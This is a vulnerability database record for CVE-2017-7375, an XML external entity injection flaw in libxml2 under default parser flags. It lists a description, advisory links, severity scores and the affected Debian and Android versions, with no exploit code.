CVE-2017-7375

CRITICAL

libxml2 < 2.9.4 - XML External Entity Injection via Default Parser Flags

Title source: manual
STIX 2.1

Description

A flaw in libxml2 allows remote XML entity inclusion with default parser flags (i.e., when the caller did not request entity substitution, DTD validation, external DTD subset loading, or default DTD attributes). Depending on the context, this may expose a higher-risk attack surface in libxml2 not usually reachable with default parser flags, and expose content from local files, HTTP, or FTP servers (which might be otherwise unreachable).

References (8)

Core 8
Core References
Patch, Third Party Advisory x_refsource_confirm
https://source.android.com/security/bulletin/2017-06-01
Third Party Advisory vendor-advisory x_refsource_debian
https://www.debian.org/security/2017/dsa-3952
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/98877
Third Party Advisory vendor-advisory x_refsource_gentoo
https://security.gentoo.org/glsa/201711-01
Issue Tracking, Patch, Third Party Advisory x_refsource_confirm
https://bugzilla.redhat.com/show_bug.cgi?id=1462203
Third Party Advisory, VDB Entry vdb-entry x_refsource_sectrack
http://www.securitytracker.com/id/1038623

Scores

CVSS v3 9.8
EPSS 0.0269
EPSS Percentile 84.0%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Details

CWE
CWE-611
Status published
Products (13)
debian/debian_linux 7.0
debian/debian_linux 8.0
debian/debian_linux 9.0
google/android 4.4.4
google/android 5.0.2
google/android 5.1.1
google/android 6.0
google/android 6.0.1
google/android 7.0
google/android 7.1.1
... and 3 more
Published Feb 19, 2018
Tracked Since Feb 18, 2026